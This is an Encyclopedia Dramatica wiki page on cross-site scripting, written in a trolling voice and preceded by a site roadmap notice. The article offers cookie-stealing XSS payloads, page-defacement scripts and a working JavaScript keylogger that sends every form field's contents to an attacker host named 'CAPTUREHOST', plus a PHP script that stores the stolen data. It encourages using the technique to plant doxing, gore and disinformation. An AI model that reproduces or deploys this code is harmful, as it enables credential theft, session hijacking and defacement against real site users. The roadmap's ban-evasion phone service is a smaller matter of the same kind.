⚠️ Encyclopedia Dramatica is currently being restored by automated scripts ⚠️
There's been a lot of questions as to what's going on with the site and what comes next. So we have this (ordered) roadmap of what's being worked on and what's to come. This will be updated until the roadmap is complete as Æ has a lot of missing features and ideas that I'd like to fix in regards to its offerings before I implement big plans for the site's popularity and well-being in 2021.
Æ Roadmap
Content restoration (Mostly done, few things missing that will be restored sporadically)Image restoration (Being run in background, nothing I can do cept wait)
Æ Imageboard (Currently being worked on)
Mediawiki upgrade and backend fixes
.onion domain for Tor-friendly editing and viewing
CSS overhaul (Fixing things like the videos on mobile, and overall a rehaul of the wiki's look to be more friendly to readers)
Paid bounty board for new articles (Won't be managed by me for legal reasons however I will ensure it runs smoothly)
Anonymous phone # service for those seeking ban evades from Twitter as well as a phone number not tied to their name (more details at launch)
Currently we are nearing our annual LLC renewal fee ($650) as well throwing the funds required for these other changes and aspects. If you would like to support Æ consider purchasing a copy of The Hustler's Bible or securing some Merch. Donating is also appreciated however I would rather give something back as per the two options above.
If you have any questions you can join our public Telegram chat to DM me privately or @ me in chat.
You can also email me via [email protected]
Merch notes: Thank you to all who have purchased merch. We will ship late January or mid February depending on our provider's speed.
Here's to setting the world on fire in 2021!
- aediot
Cross Site Scripting
|
FACT ALERT: XSS is winrar. If you can pull it off, pat yourself on the back. |
Cross site scripting (or XSS) is a method of exploiting a website that does not validate user supplied input or sanitize output. Web servers that fail to do so will allow you to run arbitrary javascript on an end users browser.
Entrypoints
XSS entrypoints are usually found in webforms & querystrings. You can test for the existence of xss by using the following string.
<script>alert(document.cookie);</script>
You also may be able to include javascript embedded in a flash object, or an image like so:
<img src="javascript:alert(document,cookie);" />
But this varies between browsers. Another way is like this
<a href="javascript:alert(document.cookie);">link</a>
But this requires your target to click a link
Things To Do
- Hijack user sessions/cookies
- Since user session ID and occasionally usernames/passwords are stored in cookies, you can steal cookie data to impersonate a user by either finding their uname/pass or using their server session ID.
- Log Keystrokes
- You can write some code in javascript to send data via ajax/iframes when a user presses a key.
- Deface pages
- If the xss exploit you've discovered is saved into a database and redisplayed to other users, you can deface the page by overlaying content.
Sample Code
//---Javascript //Overlay a black background with LOL in big white text html='<div style="position:absolute;top:0px;left:0px;z-index:99;width:100%;height:100%;background-color:black;"><h1 style="color:#fff;">LOLHAI</h1></div>'; document.write(html);
//---Javascript //Change the content of <body> html='<h1>LOLHAI</h1>'; window.document.body.innerHTML=html;
//---Javascript
//You can study the structure of a site and change the content for any element ID or tag name
html='<h1>LOLHAI</h1>';
document.getElementById('element_id').innerHTML = html;
document.getElementsByTagName('element_tag')[child].innerHTML = html;
//This is epic for trolling by inserting typos, disinformation, dox, gore, cp, etc
//---Javascript
//This is an example of a keylogger. There is also a php file on this article you can use to capture the data.
randVal = 'loldongs'+(Math.round((10000-5000) * Math.random() + 5000));
wp='<div style=":display:block;width:0;height:0;z-index:0;overflow:hidden;" id="'+randVal+'"></div>';
window.onload=function(){
window.document.body.innerHTML='<div onkeyup="kl();">'+window.document.body.innerHTML+wp+'</div>';
}
function kl(){
inp=document.getElementsByTagName('input');
qs='';
for(var i = 0; i < inp.length; i++){
qs=qs+i+'_'+inp[i].name+'='+inp[i].value+'&';
}
cn=document.getElementById(randVal);
kf='<iframe style="width:0;height:0;" src="http://CAPTUREHOST/capture.php?'+qs+'"></iframe>';
cn.innerHTML=kf;
}
//---capture.php
//This will catch all data passed as querystrings and save them in a readable format with IP, referrer & timestamp
<?php
$dumpFile = "dump";
$fh = fopen($dumpFile, 'a') or die("can't open file");
fwrite($fh, date("m/d/y_g:i:s").'|'.$_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_REFERER'].'|');
foreach($_GET as $qs => $val){
fwrite($fh, $qs."=".$val.'|');
}
fwrite($fh, "\n");
fclose($fh);
?>
See Also
|
|
Cross Site Scripting is part of a series on Programming. [Enter the Matrix] |
|
ADA • Assembly • C • C++ • COBOL • Debug • DOS • Erlang • Error • Fdisk • Fortran • Integer • Java • LOLCode • Machine Code • Matlab • MIRC Script • MUMPS • Open Source • Perl • PHP • Programming language • Python • QBASIC • Ruby on Rails • Scratch • SSH • Visual Basic
Firefox XPS IRC Attack • Safari XPS Attack • Sandworm
Bill Gates • Linus Torvalds • Weev • Goatse Security • Theo de Raadt
Operating system • Warez • Notepad • Is not a bug, it's a feature • Database Error |
|
Cross Site Scripting is part of a series on Security Faggots |
1337 h4x0rz Captain Crunch • Cult of the Dead Cow • David L. Smith • Gary McKinnon • GOBBLES • HD Moore • Jeff Moss • Kevin Mitnick • Lance M. Havok • Robert Morris • Theo de Raadt • weev • Woz
Try-Hards
2cash • AnonOps • Brian Salcedo • Fearnor • Fry Guy • Gadi Evron • g00ns • Hack This Site • Hacking Team • hann • Joanna Rutkowska • John Field • Joseph Camp • Lizard Squad • LulzSec • Mark Zuckerberg • MarshviperX • Masters of Deception • Michael Lynn • Krashed • Raven • r000t • Ryan • Steve Gibson • th3j35t3r • The Regime • Sabu • Zeekill
Related Shit
Avira • Ciscogate • Cloudflare • Conficker • CyberDefender • Defcon • The Gibson • The Great Em/b/assy Security Leak of 2007 • Heartbleed • I GOT NORTON! • Is Your Son a Computer Hacker? • Operation Sundevil • PIFTS.exe • Social engineering • Stylometry • SubSeven • Zone-H |
|---|
|
Cross Site Scripting is part of a series on Visit the Trolls Portal for complete coverage. |
